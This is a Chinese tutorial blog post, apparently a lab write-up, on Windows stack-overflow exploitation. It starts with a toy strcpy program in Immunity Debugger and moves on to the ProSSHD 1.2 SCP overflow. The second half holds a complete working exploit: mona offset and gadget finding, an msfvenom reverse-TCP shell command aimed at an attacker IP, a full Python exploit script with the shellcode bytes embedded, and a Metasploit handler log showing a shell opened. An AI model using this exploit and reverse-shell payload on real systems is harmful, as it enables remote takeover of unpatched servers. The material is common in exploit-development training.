2. 程式人生 > >windows漏洞利用

windows漏洞利用

阿新 發佈:2018-11-12

編譯執行 原始碼:

#include <stdio.h>

greeting(char *temp1, char *temp2){
	
	char name[400];
	strcpy(name, temp2);
	printf("Hello %s %s\n", temp1, temp2);
}

main(int argc, char *argv[]){
	greeting(argv[1], argv[2]);
	printf("Bye %s %s\n", argv[1], argv[2]);
}

使用Immunity Debugger 除錯程式:

F2設定斷點,F9執行,F7單步執行,F8單步執行並跨過函式呼叫

X86 中有八個通用暫存器:

EAX累加器暫存器,EBX基礎暫存器,ECX計數暫存器,EDX資料暫存器,ESI源暫存器,EDI目的暫存器,EBP基本指標,ESP堆疊指標,EIP指令指標。

alt+M 檢視記憶體對映,包括堆、棧、DLL和可執行檔案:

alt+e 可執行模組列表:

修改程式碼方便除錯,上面程式碼使用python 命令列傳參引數除錯簡單,但是不是很方便。

#include <stdio.h>

greeting(char *temp1, char *temp2){
	
	char name[10];
	strcpy(name, temp2);
	printf("Hello %s %s\n", temp1, temp2);
}

main(int argc, char *argv[]){
	greeting(argv[1], argv[2]);
	printf("Bye %s %s\n", argv[1], argv[2]);
}

Immunity debugger除錯:

笨方試數溢位,引數不能多也不能太多也不能少

傳入引數 程式崩潰

alt + e 雙擊除錯程式

F9執行 -> F8跨過函式呼叫

繼續執行程式崩潰。程式沒有異常的處理,交給系統處理。

————————————————————————————————————————————————————————

編寫漏洞攻擊程式:

控制EIP、確定偏移、確定攻擊向量、構建漏洞攻擊、測試漏洞攻擊、除錯漏洞攻擊程式。

prosshd1.2漏洞測試:

在windows中建立一個測試使用者,新增使用者啟動服務看是否能連線主機:

ssh -p 22 [email protected]
The authenticity of host '192.168.1.102 (192.168.1.102)' can't be established.
RSA key fingerprint is SHA256:JPOlsgfYZhAizWUj7xFiiMldKlJWw0utnRt27m5ty8g.
Are you sure you want to continue connecting (yes/no)? ye
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.102' (RSA) to the list of known hosts.
[email protected]'s password: 
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Users\Public\Program Files\Lab-NC\ProSSHD>exit
Connection to 192.168.1.102 closed.

python溢位程式碼:

#!/usr/bin/python

import paramiko
from scpclient import *
from contextlib import closing
from time import sleep
import struct

hostname = "192.168.1.102"
username = "test"
password = "123456"
req = "A" * 502  #有可能是501或者更大 需要嘗試

ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username,key_filename=None, password=password)

sleep(15)

with closing(Read(ssh_client.get_transport(), req)) as scp:
	scp.receive("foo.txt")

啟動python程式,在windows中快速開啟Immunity 新增wsshd.exe程序

F9執行,最後程式崩潰看到EIP控制權

確定偏移 mona 外掛 : https://github.com/corelan/mona 

底部輸入命令 開啟日誌視窗

回到CPU主頁面 底部輸入命令 生成502位元組模板,

修改python程式:

req = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6A"

執行程式,在偵錯程式中除錯結果:

使用mona計算EIP偏移:

windows系統棧位於低地址中,為了避開0x00等空位元組,需要在除錯程式或DLL中搜索該操作碼。

該模組 並不受漏洞攻擊反制操作保護,也不參與ASLR,在其中找到操作碼。

會在D:\tools\monalogs\wsshd目錄下看到jmp.txt 開啟檢視

0x7c345c30 : push esp # ret  | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll)

測試shellcode:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.105 LPORT=4444 -b "\x00" -f python -v shellcode
import paramiko
from scpclient import *
from contextlib import closing
from time import sleep
import struct

hostname = "192.168.1.102"
username = "test"
password = "123456"
jmp = struct.pack('<L', 0x7c345c30)
pad = "\x90" * 12

shellcode =  ""
shellcode += "\xdd\xc0\xd9\x74\x24\xf4\xbf\xad\xab\x85\x73\x5b"
shellcode += "\x33\xc9\xb1\x52\x31\x7b\x17\x03\x7b\x17\x83\x46"
shellcode += "\x57\x67\x86\x64\x40\xea\x69\x94\x91\x8b\xe0\x71"
shellcode += "\xa0\x8b\x97\xf2\x93\x3b\xd3\x56\x18\xb7\xb1\x42"
shellcode += "\xab\xb5\x1d\x65\x1c\x73\x78\x48\x9d\x28\xb8\xcb"
shellcode += "\x1d\x33\xed\x2b\x1f\xfc\xe0\x2a\x58\xe1\x09\x7e"
shellcode += "\x31\x6d\xbf\x6e\x36\x3b\x7c\x05\x04\xad\x04\xfa"
shellcode += "\xdd\xcc\x25\xad\x56\x97\xe5\x4c\xba\xa3\xaf\x56"
shellcode += "\xdf\x8e\x66\xed\x2b\x64\x79\x27\x62\x85\xd6\x06"
shellcode += "\x4a\x74\x26\x4f\x6d\x67\x5d\xb9\x8d\x1a\x66\x7e"
shellcode += "\xef\xc0\xe3\x64\x57\x82\x54\x40\x69\x47\x02\x03"
shellcode += "\x65\x2c\x40\x4b\x6a\xb3\x85\xe0\x96\x38\x28\x26"
shellcode += "\x1f\x7a\x0f\xe2\x7b\xd8\x2e\xb3\x21\x8f\x4f\xa3"
shellcode += "\x89\x70\xea\xa8\x24\x64\x87\xf3\x20\x49\xaa\x0b"
shellcode += "\xb1\xc5\xbd\x78\x83\x4a\x16\x16\xaf\x03\xb0\xe1"
shellcode += "\xd0\x39\x04\x7d\x2f\xc2\x75\x54\xf4\x96\x25\xce"
shellcode += "\xdd\x96\xad\x0e\xe1\x42\x61\x5e\x4d\x3d\xc2\x0e"
shellcode += "\x2d\xed\xaa\x44\xa2\xd2\xcb\x67\x68\x7b\x61\x92"
shellcode += "\xfb\x44\xde\x9d\x92\x2c\x1d\x9d\x75\xf1\xa8\x7b"
shellcode += "\x1f\x19\xfd\xd4\x88\x80\xa4\xae\x29\x4c\x73\xcb"
shellcode += "\x6a\xc6\x70\x2c\x24\x2f\xfc\x3e\xd1\xdf\x4b\x1c"
shellcode += "\x74\xdf\x61\x08\x1a\x72\xee\xc8\x55\x6f\xb9\x9f"
shellcode += "\x32\x41\xb0\x75\xaf\xf8\x6a\x6b\x32\x9c\x55\x2f"
shellcode += "\xe9\x5d\x5b\xae\x7c\xd9\x7f\xa0\xb8\xe2\x3b\x94"
shellcode += "\x14\xb5\x95\x42\xd3\x6f\x54\x3c\x8d\xdc\x3e\xa8"
shellcode += "\x48\x2f\x81\xae\x54\x7a\x77\x4e\xe4\xd3\xce\x71"
shellcode += "\xc9\xb3\xc6\x0a\x37\x24\x28\xc1\xf3\x54\x63\x4b"
shellcode += "\x55\xfd\x2a\x1e\xe7\x60\xcd\xf5\x24\x9d\x4e\xff"
shellcode += "\xd4\x5a\x4e\x8a\xd1\x27\xc8\x67\xa8\x38\xbd\x87"
shellcode += "\x1f\x38\x94"

req = "A" * 489 + jmp + pad + shellcode

ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username,key_filename=None, password=password)

sleep(15)

with closing(Read(ssh_client.get_transport(), req)) as scp:
	scp.receive("foo.txt")

成功:

msf exploit(multi/handler) > set payload windows/shell_reverse_tcp 
payload => windows/shell_reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.105:4444 
[*] Command shell session 1 opened (192.168.1.105:4444 -> 192.168.1.102:49282) at 2018-09-13 16:17:27 +0800

C:\Users\Public\Program Files\Lab-NC\ProSSHD>

________________________________________________________

相關推薦

windows漏洞利用

編譯執行 原始碼: #include <stdio.h> greeting(char *temp1, char *temp2){ char name[400]; strcpy(name, temp2); printf("Hello %s %s\n", temp1, tem

Windows核心漏洞利用提權教程

PS. 原文僅限於技巧計劃,嚴禁用於其餘用途。 繼上一篇“運用自動化足原舉行Windows提權”,原文將引見有閉Windows核心馬足提權的方式。爾將運用內建的Metasploit模組動作演練。經過原文的進修,你將領會體系的哪些區域性可被運用,並配合最佳可運用模組進一步的提高權力。 Wind

Struts2漏洞利用原理及OGNL機制

基本 conf 數據集 fig 然而 example 所有 def 字符串類型 Struts2漏洞利用原理及OGNL機制研究 概述 在MVC開發框架中,數據會在MVC各個模塊中進行流轉。而這種流轉,也就會面臨一些困境,就是由於數據在不同MVC層次中表現出不同的形式和狀態

永恒之藍漏洞利用復現

成功 .cn 旗艦 nal blue ima 選擇執行 win 環境搭建 一、環境搭建: IP地址 系統信息 備註 角色 192.168.0.244 win7旗艦版(未安裝MS17-010補丁版本) 需開啟445端口及SMB協議 靶機 192.168.0.10

OrientDB遠程代碼執行漏洞利用與分析

orientdb遠程代碼執行漏洞利用與分析原文見:http://zhuanlan.51cto.com/art/201708/548641.htm本文出自 “simeon技術專欄” 博客,請務必保留此出處http://simeon.blog.51cto.com/18680/1958277OrientDB遠程代碼

Mysql數據庫滲透及漏洞利用總結

mysql數據庫滲透 漏洞利用總結 Mysql數據庫滲透及漏洞利用總結Simeon Mysql數據庫是目前世界上使用最為廣泛的數據庫之一,很多著名公司和站點都使用Mysql作為其數據庫支撐,目前很多架構都以Mysql作為數據庫管理系統,例如LAMP、和WAMP等,在針對網站滲透中,很多都是跟Mys

MS12_004_midi漏洞利用

post blog gets nbsp min div xpl target host 1. use exploit/windows/browser/ms12_004_midi 2. show targets 3. info 4. set SRVHOST 【mi

CVE-2017-12149JBoss 反序列化漏洞利用

命令行 edi AC 頁面 server cto dex form 文件頭 CVE-2017-12149 漏洞描述 互聯網爆出JBOSSApplication Server反序列化命令執行漏洞(CVE-2017-12149),遠程攻擊者利用漏洞可在未經任何身份驗證的服務器

Redis漏洞利用與防禦

Redis漏洞利用與防禦Redis漏洞利用與防禦simeonRedis在大公司被大量應用,通過筆者的研究發現,目前在互聯網上已經出現Redis未經授權病毒似自動攻擊,攻擊成功後會對內網進行掃描、控制、感染以及用來進行挖礦、勒索等惡意行為,早期網上曾經分析過一篇文章“通過redis感染linux版本勒索病毒的服

ms17-010漏洞利用教程

ms17-010利用主要是方便自己之後忘了,而寫的,大佬繞過,大佬繞過,大佬繞過,重要的說三遍。哈哈攻擊機:IP地址:192.168.10.15系統:kali linux靶機:IP地址:192.168.10.13系統:win7啟動metasploit-framework~# msfconsole 查找需要用到

20155306 白皎 0day漏洞——漏洞利用原理之棧溢出利用

put strong 3.2 base 十六進制 格式 correct 3.5 3.1 20155306 白皎 0day漏洞——漏洞利用原理之棧溢出利用 一、系統棧的工作原理 1.1內存的用途 根據不同的操作系統,一個進程可能被分配到不同的內存區域去執行。但是不管什麽樣的操

20155306 白皎 0day漏洞——漏洞利用原理之DEP

alt [] name CP 圖片 惡意代碼 方法 \n 通過 20155306 白皎 0day漏洞——漏洞利用原理之DEP 一、DEP機制的保護原理 1.為什麽出現DEP? 溢出攻擊的根源在於現代計算機對數據和代碼沒有明確區分這一先天缺陷,就目前來看重新去設計計算機體系結

20155306 白皎 0day漏洞——漏洞利用原理之GS

處的 工作原理 保護 arr ddr 中比 int strcpy 統一 20155306 白皎 0day漏洞——漏洞利用原理之GS 一、GS安全編譯選項的保護原理 1.1 GS的提出 在第二篇博客(棧溢出利用)中,我們可以通過覆蓋函數的返回地址來進行攻擊,面對這個重災區,W

20155236範晨歌免考項目:web安全之漏洞利用

以及 程序 pin href pst 虛擬 php arm .html PHP和PHPinfo的簡單介紹 https://www.cnblogs.com/fcgfcgfcg/p/9234978.html 通過CSRF漏洞加深理解 https://www.cnblogs.

linux_kernel_uaf漏洞利用實戰

driver lib 指向 init 變化 ret paste gadget 開啟 前言 好像是國賽的一道題。一個 linux 的內核題目。漏洞比較簡單,可以作為入門。 題目鏈接: 在這裏 正文 題目給了3個文件 分配是 根文件系統 , 內核鏡像, 啟動腳本。解壓運行 b

CVE-2015-3864漏洞利用分析(exploit_from_google)

內存布局 labs dep ase printf ram onf gad 之間 前言 接下來要學習安卓的漏洞利用相關的知識了,網上搜了搜,有大神推薦 stagefright 系列的漏洞。於是開幹,本文分析的是 google 的 exploit. 本文介紹的漏洞是 CVE-2

Android內核漏洞利用技術實戰:環境搭建&棧溢出實戰

fin vmlinux ant eas turn git static gin qemu 前言 Android的內核采用的是 Linux 內核,所以在Android內核中進行漏洞利用其實和在 一般的 x86平臺下的 linux 內核中進行利用差不多。主要區別在於 Andro

Windows利用goaccess(docker)分析Nginx日誌

        由於公司專案需要分析Nginx,工具不少,比如ngxtop的實時監控,經過對其初步瞭解,發現必須所有配置檔案都在nginx.conf下才可以使用。然而專案卻include了很多配置。而且由於資源限制,在伺服器上安裝也不現實,因此有了日誌分析的念頭。而

曲速未來揭示 :新的CVE-2018-8373在野外發現漏洞利用

區塊鏈安全諮詢公司 曲速未來 訊息:在9月18日,也就是在Trend Micro研究人員釋出分析UAF漏洞CVE-2018-8373的文章後一個月,又發現了一個影響VBScript引擎的新版Windows版本的免費使用(UAF)漏洞CVE-2018-8373的細節,然後發現了另一個漏洞,也是在野外使

windows利用批處理指令碼監控程式

1.要監控的程式為使用cygwin環境編譯的exe可執行檔案hello.exe,原始碼如下: #include <stdio.h> #include <unistd.h> void main(void) {   while(1)   {     printf("hello